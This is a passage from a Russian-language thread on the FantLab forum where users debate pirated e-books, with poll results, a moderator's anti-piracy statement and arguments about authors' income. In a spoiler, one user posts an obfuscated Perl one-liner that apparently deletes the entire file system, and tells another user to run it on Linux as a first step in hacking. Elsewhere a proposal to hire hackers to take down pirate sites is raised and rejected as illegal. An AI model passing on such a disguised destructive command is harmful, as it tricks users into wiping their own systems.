Ваше отношение к пиратскому ...

Вы здесь: Форумы sam.fantlab.ru > Форум «Другие окололитературные темы» > Тема «Ваше отношение к "пиратскому" контенту»

Ваше отношение к "пиратскому" контенту

# Варианты ответов Проголосовало  
 Качаю и буду качать нелегальный контент
 855

Покупал и буду покупать легальный контент
 95

Покупал и буду покупать бумажные книги
 598

Раньше качал нелегальный контент, теперь покупаю легальный
 46

Раньше покупал легальный контент, теперь качаю нелегальный
 132

Качал и буду качать как нелегальный, так и легальный контенты
 716

свой вариант ответа
 171

голосование окончено!
 автор  сообщение

гранд-мастер

Ссылка на сообщение 22 мая 2007 г. 14:14  
цитировать   |    [  ] 
Официальная позиция сайта "Лаборатория Фантастики":
мы не поддерживаем литературное "пиратство" и призываем фантлабовцев уважать труд авторов, переводчиков, художников, издателей и всех-всех-всех остальных, благодаря которым мы получаем возможность наслаждаться отличными книгами.

Если у вас есть возможность купить книгу (и не важно, в электронном виде, или в бумажном) — сделайте это. Поддержите автора, и всех тех, кто над ней работал.

миродержец

Ссылка на сообщение 3 марта 2012 г. 02:19  
цитировать   |    [  ] 

цитата metr92

Итак:
Предлагаю авторам (по отдельности или объединившись в группы) войти в контакт с хакерами. И за часть гонорара тупо рушить пиратские сайты (целиком и полностью).

...А найти хакеров…в общем тоже не сложно).

... И еще- заранее ответ на вопросы из серии «где я и где хакеры»

^_^
О Великие Древние, спасибо, что позволили мне увидеть этот пост и снять с него скриншот.

скрытый текст (кликните по нему, чтобы увидеть)

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
–––
Мы начинаем со смелого допущения, что цель войны — победа над заявленным противником.
Я мыслю, следовательно, я дискредитирую

гранд-мастер

Ссылка на сообщение 3 марта 2012 г. 02:20  
цитировать   |    [  ] 
metr92

цитата

Предлагаю авторам (по отдельности или объединившись в группы) войти в контакт с хакерами. И за часть гонорара тупо рушить пиратские сайты (целиком и полностью).

Юристы точнее укажут что это за статья в УК такая за это всё имеется., это раз, и такие попытки уже были неоднократно, ДДосили пиратов, это два, и ни к чему это не приводит абсолютно — это три, а с моральной т.з. я не буду ничего объяснять, это и так понятно.

гранд-мастер

Ссылка на сообщение 3 марта 2012 г. 02:31  
цитировать   |    [  ] 

цитата FixedGrin

О Великие Древние, спасибо, что позволили мне увидеть этот пост и снять с него скриншот.

Да пожалуйста. Всегда рад порадовать вас своими идеями.

цитата С.Соболев

Юристы точнее укажут что это за статья в УК такая за это всё имеется., это раз, и такие попытки уже были неоднократно, ДДосили пиратов, это два, и ни к чему это не приводит абсолютно — это три, а с моральной т.з. я не буду ничего объяснять, это и так понятно.

Статья УК и за пиратство наверняка имеется, да что то не действует (юристы действительно скажут точнее). Про то что ДДосили- ну так одно дело разовые акции, а другое постоянные. А по поводу моральной точки зрения действительно все понятно.

миродержец

Ссылка на сообщение 3 марта 2012 г. 02:50  
цитировать   |    [  ] 

цитата metr92

Статья УК и за пиратство наверняка имеется, да что то не действует

Вы под спойлер вот здесь посмотрите, не робейте.
Начните освоение хакерского искусства с запуска этой программы. Я гарантирую, что результаты под свободно распространяемой операционной системой GNU/Linux будут методически очень полезны.
–––
Мы начинаем со смелого допущения, что цель войны — победа над заявленным противником.
Я мыслю, следовательно, я дискредитирую

активист

Ссылка на сообщение 3 марта 2012 г. 09:28  
цитировать   |    [  ] 

цитата Jylia

Бедный вы несчастный. Что такое свечи вы наверное только в исторических романах читали? Ну купите аккумуляторный светильник, будет вам щастье. Правда в случае е-читалки это не поможет, там только генератор исправит ситуацию.

Ну скажите, что вы так не думаете, не разочаровывайте меня.

цитата Karavaev

Однако для маленьких детей (ну лет до 7) бумажная книга все равно нужна, так как тактильные ощущения и цветовосприятие при пользовании такой книгой помогают правильно формироваться и развиваться детскому мозгу. Причем в совокупности.

:beer:

цитата zelenskaya

Господа!
Книги разные нужны. книги разные важны — хоть бумажные, хоть электронные.
Предлагаю заключить мирный союз и поздравить друг друга с приходом весны.

:beer:

Засим оффтоп прекращаю, и читаю ветку дальше.

миродержец

Ссылка на сообщение 3 марта 2012 г. 09:35  
цитировать   |    [  ] 

цитата Korochun

у скажите, что вы так не думаете, не разочаровывайте меня.

Ваши проблемы. Однако если отключают электричество, бумажную книгу я с удовольствием читаю при свечах. Ридер тоже можно, но время уже ограничено. А вот комп тут проигрывает бумаге мгновенно, и не важно, сколько терабайт литературы на диске.
–––
Разница между фантастикой и реальностью в том, что фантастика должна иметь хоть какой-то смысл

активист

Ссылка на сообщение 3 марта 2012 г. 09:41  
цитировать   |    [  ] 
Продолжим, хотя надо бы и не здесь.

цитата Jylia

Ридер тоже можно, но время уже ограничено. А вот комп тут проигрывает бумаге мгновенно, и не важно, сколько терабайт литературы на диске.

С ноября 2010 заряжал 2 или 3 раза, т. е. хватает.

миротворец

Ссылка на сообщение 3 марта 2012 г. 10:19  

цитата Korochun

хотя надо бы и не здесь.

сообщение модератора

Золотые слова. Заканчиваем оффтоп.
–––
...когда круг времён завершится и эльфы вернутся назад.

гранд-мастер

Ссылка на сообщение 3 марта 2012 г. 11:49  
цитировать   |    [  ] 

цитата esaul

отвечать — бессмысленно

Удобная позиция.
Сначала заявить что в голову взбредёт, а на недоуменные вопросы "а с чего вы такое взяли" надувать щёки, махать шашкой и рычать "пшли вон, мужичье, казак идёт!"

Ну в общем, наверное, ответ по-любому получился исчерпывающий :-)))

Вопрос "кто из писателей отказался от литературного ремесла под давлением пиратов" можно считать закрытым -)

авторитет

Ссылка на сообщение 3 марта 2012 г. 11:52  
цитировать   |    [  ] 

цитата metr92

Или просто бить пиратов.

Абсолютно безопасно — всё равно ни кто не поверит.

миродержец

Ссылка на сообщение 3 марта 2012 г. 11:52  
цитировать   |    [  ] 

цитата glaymore

Вопрос "кто из писателей отказался от литературного ремесла под давлением пиратов" можно считать закрытым -)

Вообще-то вопрос звучал: "Кто из авторов перестал писать из-за того, что не печатали". Причина отказа издательств не уточнялась. Поскольку заметное снижение тиражей по причине распространенности и доступности электронного текста началось только в последние пару лет, ваша формулировка вопроса несколько преждевременна. Лет через 5 будем посмотреть.
–––
Разница между фантастикой и реальностью в том, что фантастика должна иметь хоть какой-то смысл

магистр

Ссылка на сообщение 3 марта 2012 г. 12:13  
цитировать   |    [  ] 

цитата metr92

И за часть гонорара тупо рушить пиратские сайты (целиком и полностью).

Гонораров может не хватить:-D

гранд-мастер

Ссылка на сообщение 3 марта 2012 г. 12:49  
цитировать   |    [  ] 

цитата ArK

Или просто бить пиратов.

А зачем вы передергиваете?

Возможно мое предложение глупое\необоснованное\аморальное и т.п. Но как минимум, прежде чем это признать, хотелось бы услышать контраргументы. А не:

цитата Serg50

Гонораров может не хватить

Гонораров может и не хватить. а может и хватить.
Чисто умозрительно и теоретически не вижу почему бы схема не сработала.

P.S. На засыпку о "глупых" идеях: http://www.in-exp.ru/component/content/ar...

миротворец

Ссылка на сообщение 3 марта 2012 г. 13:00  
цитировать   |    [  ] 

цитата metr92

Возможно мое предложение глупое\необоснованное\аморальное и т.п.

Безусловно. А ещё — противозаконное, и уже обсуждалось в этой теме.
–––
...когда круг времён завершится и эльфы вернутся назад.

авторитет

Ссылка на сообщение 3 марта 2012 г. 13:02  
цитировать   |    [  ] 

цитата metr92

А зачем вы передергиваете?

Это моё предложение.

гранд-мастер

Ссылка на сообщение 3 марта 2012 г. 13:03  
цитировать   |    [  ] 

цитата drogozin

и уже обсуждалось в этой теме.

Аргумент услышан) Извиняюсь- удаляюсь.

авторитет

Ссылка на сообщение 3 марта 2012 г. 13:12  
цитировать   |    [  ] 

цитата metr92

Уже предлагалось. Я честно выразил готовность войти в в долю. Абсолютное большинство защитников пиратства в данной теме, убедили меня отставить моральные ограничители. Британия боролась с пиратами одним методом — вешать на рее! И успешно задушили всю Карибскую вольницу. Так что, ау, хакеры!:cool!:

цитата glaymore

Удобная позиция.

Логичная. 1) Речь шла о перспективах отказа писателей от бесплатной работы. То есть, фактов непосредственной "смерти" того или иного автора, за последние 3-4 года всё нарастающего пиратства, вряд ли кто-то сможет привести. 2) буде таковые приведены (см.пост Перумова о двух писательницах), где гарантия, что сие удовлетворит взыскательный вкус Вероники и иже с нею? Скорее всего будет тоже презрительное фырканье, типа, "ах, тоже мне потеря! да хоть сто таких умрёт — только польза для литературы!" и т..д.
В свете выше перечисленного, отвечать на второй её вопрос глупо. Но хоть до Вас дошло, почему и как я ответил на первый. Вы же, за свой бред с ценами на эл.книгу в 20 руб. и сравнением книги с кино — вообще никак не ответили. Ибо, нечем-с...

миродержец

Ссылка на сообщение 3 марта 2012 г. 13:21  
цитировать   |    [  ] 

цитата esaul

Речь шла о перспективах отказа писателей от бесплатной работы. То есть, фактов непосредственной "смерти" того или иного автора, за последние 4-5 лет всё нарастающего пиратства, вряд ли кто-то сможет привести.

Если я не ошибаюсь, то Диана Удовиченко в конце прошлого года писала в своем ЖЖ о желании закончить свою писательскую деятельность именно по причине все возрастающего пиратсткого беспредела в России.
–––
Жили книжные дети, не знавшие битв,
Изнывая от мелких своих катастроф...

авторитет

Ссылка на сообщение 3 марта 2012 г. 13:22  
цитировать   |    [  ] 
[Сообщение изъято модератором]

авторитет

Ссылка на сообщение 3 марта 2012 г. 13:24  
цитировать   |    [  ] 

цитата Gelena

Если я не ошибаюсь, то Диана Удовиченко

Не ошибаетесь. Но думаете это имя, чем-то тронет "высоких знатоков"? Я же писал, им хоть 100 таких Диан откажутся — а вы дайте нам такого, чтоб МЫ пожалели...
Страницы: 123...177178179180181...619620621    🔍 поиск

Вы здесь: Форумы sam.fantlab.ru > Форум «Другие окололитературные темы» > Тема «Ваше отношение к "пиратскому" контенту»

Новое сообщение по теме «Ваше отношение к "пиратскому" контенту»

тема закрыта!

⇑ Наверх